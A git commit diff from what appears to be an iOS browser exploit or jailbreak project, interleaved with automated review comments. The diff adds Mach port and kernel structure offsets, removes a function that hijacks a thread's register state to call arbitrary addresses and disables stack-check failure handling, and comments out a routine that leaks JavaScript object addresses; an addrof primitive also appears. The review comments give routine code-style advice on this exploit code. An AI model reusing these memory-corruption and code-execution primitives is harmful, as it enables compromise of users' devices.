authorspv420 <spv@spv.sh>2022-07-30 23:57:16 -0400
committerspv420 <spv@spv.sh>2022-07-30 23:57:16 -0400
commit30582c3535e1a41a0d385435c14a632bdc0a3715 (patch)
tree166c09508923ec75b5a588c31e0a039189589a4c
parent7cef8e59cad6f0755b9841353fcc5e39076d5387 (diff)
fix my own incompetence
-rw-r--r--src/js/main.js36
-rw-r--r--src/js/primitives/call.js94
-rw-r--r--src/js/primitives/mem.js3
3 files changed, 36 insertions, 97 deletions
diff --git a/src/js/main.js b/src/js/main.js
index e077fbe..ec7e814 100644
--- a/src/js/main.js
+++ b/src/js/main.js
@@ -18,6 +18,9 @@ var PROT_EXEC = 0x4;
var MAP_PRIVATE = 0x2;
var MAP_ANON = 0x1000;
+var RTLD_NOW = 2;
+var PAGE_SIZE = 0x1000;
+var O_RDONLY = 0;
var victim = {a: 13.37};
@@ -33,7 +36,7 @@ if (0) {
*/
puts = function (){};
-}
+ }
}
var JSStringCreateWithUTF8CString = 0x239f9d0d;
@@ -47,6 +50,35 @@ var kCFPreferencesCurrentHost;
var kIOMasterPortDefault = NULL;
var options = {};
+var sanity_port = 0;
+var MACH_PORT_RIGHT_RECEIVE = 0x1;
+var MACH_MSG_TYPE_MAKE_SEND = 0x14;
+var MACH_PORT_LIMITS_INFO = 0x1;
+var MACH_PORT_LIMITS_INFO_COUNT = 0x1;
+var kport_size = 0x78;
+var kport_ip_bits4 = 0x0;
+var kport_ip_references4 = 0x4;
+var kport_ip_lock_type4 = 0x10;
+var kport_ip_messages_port_qlimit2 = 0x42;
+var kport_ip_receiver4 = 0x4c;
+var kport_ip_srights4 = 0x70;
+var KERN_SUCCESS = 0;
+var NULL = 0;
+var MACH_PORT_NULL = 0;
+var req_init_port_set = 0x1c;
+var req_head_msgh_bits = 0x0;
+var req_head_msgh_request_port = 0x8;
+var req_head_msgh_reply_port = 0xc;
+var req_head_msgh_id = 0x14;
+var req_msgh_body_msgh_descriptor_count = 0x18;
+var MACH_MSG_OOL_PORTS_DESCRIPTOR = 0x2;
+var req_init_port_set_address = 0x0;
+var req_init_port_set_count = 0x4;
+var MACH_RCV_MSG = 0x2;
+var MACH_MSG_TIMEOUT_NONE = 0;
+var TASK_BSDINFO_OFFSET = 0x200;
+var BSDINFO_PID_OFFSET = 0x8;
+
function parse_nvram_options() {
// read_u32(dlsym(dlopen("/System/Library/Frameworks/IOKit.framework/IOKit", RTLD_NOW), "kIOMasterPortDefault"));
var kIOMasterPortDefault_ptr = shit_heap(4)
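Review bot: `var NULL = 0;` is introduced below the existing line `var kIOMasterPortDefault = NULL;`, and since `var` hoists only the declaration, that assignment sees `undefined` rather than `0` when this script is the first to define NULL; if NULL is already a global from an earlier-loaded script the existing value is kept, so this is only a problem in the standalone/concatenated case. Move `var NULL = 0;` (and `MACH_PORT_NULL`, which the same reasoning applies to if anything above uses it) ahead of `var kIOMasterPortDefault = NULL;` so the initializer reads a defined value. A one-line comment such as `// must precede any use of NULL: var only hoists the declaration, not the value` next to the moved line would explain the ordering to the next reader. The body of parse_nvram_options continues past the end of this hunk.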
@@ -98,7 +130,7 @@ function main() {
sym_cache["JSObjectGetProperty"] = JSObjectGetProperty + dyld_shc_slide;
sym_cache["JSContextGetGlobalObject"] = JSContextGetGlobalObject + dyld_shc_slide;
- prep_shit();
+// prep_shit();
setup_fancy_rw();
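Review bot: The call is disabled by commenting it out (`// prep_shit();`) rather than removed, and the mem.js hunk does the same to the definition by wrapping it in `/* … */`, while the call.js hunk in this same commit deletes callnarg_new outright; pick one approach, and since git already keeps the history, deleting is the cleaner choice. With the definition commented out, the file-level variables it assigned (e.g. `jsobj_addr`, `large_buf_ptr`) stay at their declared defaults, so if anything still reads them a short comment at their declarations noting that they are no longer populated would save the next reader a search. The enclosing main() starts and ends outside this hunk.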
diff --git a/src/js/primitives/call.js b/src/js/primitives/call.js
index a581c91..74a20d8 100644
--- a/src/js/primitives/call.js
+++ b/src/js/primitives/call.js
@@ -158,100 +158,6 @@ function symaddr(sym) {
return addy;
}
-function callnarg_new() {
- if (arguments.length < 1) {
- return printf("error: tried to run callnarg without args. arguments.length=%d\n", arguments.length);
- }
-
- var stack_shit = 0x161000;
-
- /*
- * setup ptrs
- */
- write_u32(countptr, count);
- write_u32(thptr, th);
- write_u32(threadptr, thread);
- write_u32(thread_stateptr, thread_state);
-
- write_u32(countptrptr, countptr);
- write_u32(thptrptr, thptr);
- write_u32(threadptrptr, threadptr);
- write_u32(thread_stateptrptr, thread_stateptr);
-
- var addy = arguments[0];
- var dyld_shc_slide = get_dyld_shc_slide();
-
- /*
- * make __stack_chk_fail infinite loop
- * (works by setting its lazy addy to its resolver, thus the resolver just
- * endlessly jumps to iself)
- */
- write_u32(__stack_chk_fail_lazy_addy + dyld_shc_slide, __stack_chk_fail_resolver + dyld_shc_slide);
-
- /*
- * if the thread doesn't exist, create it.
- */
- calls4arg("pthread_create", threadptr, 0, __stack_chk_fail_resolver + dyld_shc_slide, 0);
- thread = read_u32(threadptr);
- write_u32(th, calls4arg("pthread_mach_thread_np", thread, 0, 0, 0));
- rth = read_u32(th);
- calls4arg("thread_suspend", rth, 0, 0, 0);
-
- if (pthread_ret == 0) {
- pthread_ret = malloc(4);
- }
-
- /*
- * write first 4 to r0-r3, rest to stack
- */
- for (var i = 1; i < arguments.length; i++) {
- if (i <= 4) {
- write_u32(thread_state + ((i - 1) << 2), arguments[i]);
- } else {
- write_u32(stack_shit + ((i - 5) << 2), arguments[i]);
- }
- }
-
- var stack_shit_ret_offset = 0x58;
-
- write_u32(stack_shit + stack_shit_ret_offset, pthread_exit + dyld_shc_slide);
-
- /*
- * stack
- */
- write_u32(thread_state + (13 << 2), stack_shit);
-
- /*
- * return address, infinite loop
- */
- write_u32(thread_state + (14 << 2), add_sp_0x3c + dyld_shc_slide);
-
- /*
- * pc
- */
- write_u32(thread_state + (15 << 2), addy);
-
- /*
- * cpsr, magic
- */
- if (addy & 1) {
- write_u32(thread_state + (16 << 2), 0x40000020);
- } else {
- write_u32(thread_state + (16 << 2), 0x40000000);
- }
-
- /*
- * set the state
- */
- calls4arg("thread_set_state", rth, ARM_THREAD_STATE, thread_state, ARM_THREAD_STATE_COUNT);
- calls4arg("thread_resume", rth, 0, 0, 0);
-
- calls4arg("pthread_join", thread, pthread_ret, 0, 0);
- write_u32(count, 17);
- calls4arg("thread_get_state", rth, ARM_THREAD_STATE, thread_state, count);
- return read_u32(pthread_ret);
-}
-
function callnarg() {
if (arguments.length < 1) {
return printf("error: tried to run callnarg without args. arguments.length=%d\n", arguments.length);
diff --git a/src/js/primitives/mem.js b/src/js/primitives/mem.js
index 0c03090..d664e7b 100644
--- a/src/js/primitives/mem.js
+++ b/src/js/primitives/mem.js
@@ -308,12 +308,13 @@ var jsobj_addr;
var large_buf = new Uint32Array(0x100000);
var large_buf_ptr = 0;
+/*
function prep_shit() {
string_ref = scall("JSStringCreateWithUTF8CString", "victim");
global_object = scall("JSContextGetGlobalObject", read_u32(slid + reserve_addr + 0x44));
jsobj_addr = scall("JSObjectGetProperty", read_u32(slid + reserve_addr + 0x44), global_object, string_ref, NULL);
large_buf_ptr = leak_vec(large_buf);
-}
+}*/
function addrof(obj) {
victim.target = obj;